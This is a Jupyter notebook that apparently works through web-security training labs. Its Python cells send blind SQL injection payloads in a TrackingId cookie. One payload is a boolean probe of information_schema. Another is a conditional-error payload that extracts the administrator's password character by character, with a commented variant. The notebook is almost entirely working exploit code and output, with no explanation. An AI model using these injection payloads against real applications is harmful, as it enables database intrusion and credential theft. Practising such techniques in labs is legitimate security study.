{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 5,
   "id": "mobile-ideal",
   "metadata": {},
   "outputs": [],
   "source": [
    "import requests\n",
    "\n",
    "url = \"https://acce1f1e1f8e6f2080f2241a008d003e.web-security-academy.net/filter?category=Lifestyle\"\n",
    "cookies_dic = {\n",
    "    \"TrackingId\": \"WnTIs22An1XL4Ftz' and ascii(substring((select table_schema from information_schema.tables limit 1),1,1)) = 32--\",\n",
    "    \"session\": \"DAluu6oXIoHXDc0dxxg5bnDD8Ut9IooQ\"\n",
    "}"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 6,
   "id": "involved-scotland",
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "no\n"
     ]
    }
   ],
   "source": [
    "resp = requests.get(url=url, cookies=cookies_dic)\n",
    "if \"Welcome\" in resp.text:\n",
    "    print(\"yes\")\n",
    "else:\n",
    "    print(\"no\")"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 4,
   "id": "beautiful-closing",
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "error occurs, yes\n"
     ]
    }
   ],
   "source": [
    "import requests\n",
    "url = \"https://acee1f8a1f88d24480a65915007d005b.web-security-academy.net/filter?category=Accessories\"\n",
    "\n",
    "res = []\n",
    "cookies_dic = {\n",
    "    \"TrackingId\": \"UMq6OTsVojf6P8L7'||(select case when ascii(substr(password,1,1))>152 then to_char(1/0) else '' end from users where username='administrator')||'\",\n",
    "    \"session\": \"I7OpYfiPxgLyNUboj2rI0DyF6eoFr3i7\"\n",
    "}\n",
    "resp = requests.get(url=url, cookies=cookies_dic)\n",
    "if \"Internal Server Error\" in resp.text:\n",
    "    print(\"error occurs, yes\")\n",
    "else:\n",
    "    print(\"no\")\n",
    "    \n",
    "#    ||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.8.5"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 5
}
